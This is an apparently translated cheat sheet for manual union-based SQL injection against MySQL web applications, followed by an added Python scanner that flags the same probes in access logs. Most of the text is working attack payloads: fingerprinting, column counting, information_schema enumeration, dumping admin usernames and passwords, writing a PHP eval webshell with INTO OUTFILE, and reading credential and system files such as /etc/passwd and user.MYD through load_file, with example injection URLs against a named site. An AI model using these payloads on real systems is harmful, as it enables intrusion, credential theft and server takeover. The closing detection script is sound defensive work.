/*   confirms the database type (only MySQL parses the /* comment)
and ord(mid(version(),1,1))>51/*   confirms the database version: 51 is the ASCII code for "3"; a normal page means > 4.0, an error means < 4.0
union select 1,2,3,...   a normal page verifies the number of fields
order by 13   the largest number that still returns a normal page is the field count
union select 1,2,3,4,...,11,12,13 from admin   returns a normal page if the guessed table name admin exists; the position whose number is echoed on the page (here 2) is the usable field
union select 1,version(),3,...,13 from admin   reads the database version
union select 1,username,3,...,13 from admin   reads the account/password
union select 1,username,3,...,13 from admin where id=2   reads the 2nd user of the admin table (the primary key is id)
and ord(mid(user(),1,1))=114/*   checks for ROOT privilege; a normal page means it is present
Brute-force the field count:
order by num /*
Match the fields:
and 1=1 union select 1,2,3,4,5,...,N /*
Brute-force the displayed field positions:
and 1=2 union select 1,2,3,4,5,...,N /*
Use the built-in functions to read database information:
version()  database()  user()
Read database information without guessing the usable field (does not work on some sites):
and 1=2 union all select version()/*
and 1=2 union all select database()/*
and 1=2 union all select user()/*
Operating system information:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
Database privilege:
and ord(mid(user(),1,1))=114/*   a normal page means root
Brute-force the database (MySQL > 5.0)
MySQL 5 and above ship with the built-in database information_schema, which stores the structure information of every database and table in MySQL.
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
Guess the tables:
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=<database name in hex> limit 0,1   (limit start,count: 0 is the first record, 1 shows one record)
Guess the fields:
and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=<table name in hex> limit 0,1
Brute-force the password:
and 1=2 union select 1,2,3,<username column>,5,6,7,<password column>,8,9 from <table name> limit 0,1
Advanced usage (show two data items through one usable field):
union select 1,2,3,concat(<username column>,0x3c,<password column>),5,6,7,8,9 from <table name> limit 0,1
Write a webshell directly (root privilege)
Conditions: 1. Know the physical path of the site
2. Have sufficient privileges (test with select ... from mysql.user)
3. magic_quotes_gpc() = OFF
select '<?php eval($_POST[cmd])?>' into outfile '<physical path>'
and 1=2 union all select <one-line shell as a HEX value> into outfile '<path>'
Common load_file() paths:
1. replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
The two forms above display the full source of a PHP file. Sometimes some characters are not replaced ("<" is replaced with a space here); otherwise the page renders the returned code and it cannot be viewed.
3. load_file(char(47)) can list the root directory on FreeBSD and SunOS.
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Apache virtual host configuration on Linux
5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf: Apache configuration on Windows
6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration of a site developed in JSP
7. c:/Resin/conf/resin.conf, /usr/local/resin/conf/resin.conf
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure
11. c:\windows\system32\inetsrv\MetaBase.xml: IIS virtual host configuration
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual hosts
15. /etc/sysconfig/iptables: firewall policy
16. /usr/local/app/php5/lib/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration file
18. /etc/redhat-release: Red Hat system version
19. C:\mysql\data\mysql\user.MYD: MySQL user passwords
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address
21. /usr/local/app/php5/lib/php.ini: PHP settings
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: virtual site settings
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. c:\windows\my.ini
25. c:\boot.ini
Common website configuration files: config.inc.php and config.php. load_file() must be used in the form replace(load_file(HEX),char(60),char(32)).
Note:
char(60) is <
char(32) is a space
Problems with manual injection:
After injection the page shows:
Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation UNION
For example: http://www.bkjia.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
This is caused by inconsistent character encodings before and after the UNION.
Solution: wrap the parameter in unhex(hex(parameter)). The URL above becomes:
http://www.bkjia.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
and the injection can continue.
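A detection-side view of the probe sequence above (the ord(mid()) version and privilege checks, order by column counting, union select enumeration, information_schema reads, load_file() and the unhex(hex()) wrapper), as an added example that is not part of the original cheat sheet: a small Python scanner that URL-decodes access-log requests and labels which probe step each one matches. The log lines, client addresses and script names are constructed.

```python
"""Added defensive example (not part of the original cheat sheet): flag the union-based
MySQL injection probes described above in web-server access logs. Log lines are constructed."""
import re
from urllib.parse import unquote_plus

# One regex per probe step on this page; the names double as finding labels.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "file_io": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I),
    "fingerprint_func": re.compile(r"\b(version|database|user)\s*\(\s*\)", re.I),
    "char_probe": re.compile(r"\bord\s*\(\s*mid\s*\(", re.I),
    "comment_tail": re.compile(r"(/\*|--)$"),
}
# Common Log Format: client identd user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalise(path):
    """URL-decode twice (undoes %25 double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(path))).strip()

def classify(path):
    """Names of the signatures a request path matches, in SIGNATURES order ([] if clean)."""
    text = normalise(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines):
    """Return (ip, status, signatures, decoded path) for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := classify(m["path"])):
            findings.append((m["ip"], m["status"], hits, normalise(m["path"])))
    return findings

SAMPLE_LOG = [  # constructed lines mirroring the probe sequence on this page
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /instrument.php?ID=13 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /instrument.php?ID=13%20and%20ord(mid(version(),1,1))>51/* HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /instrument.php?ID=13%20order%20by%2013/* HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /instrument.php?ID=13%20and%201=2%20union%20select%201,version(),3,4,5%20from%20admin/* HTTP/1.1" 200 734',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x2F6574632F706173737764))),3,4,user()%20 HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, status, hits, path in scan(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits):45} {path}")
```

Decoding before matching matters: the page's own URLs are %20-encoded, and the double decode also catches %2520 variants that a single-pass filter would miss.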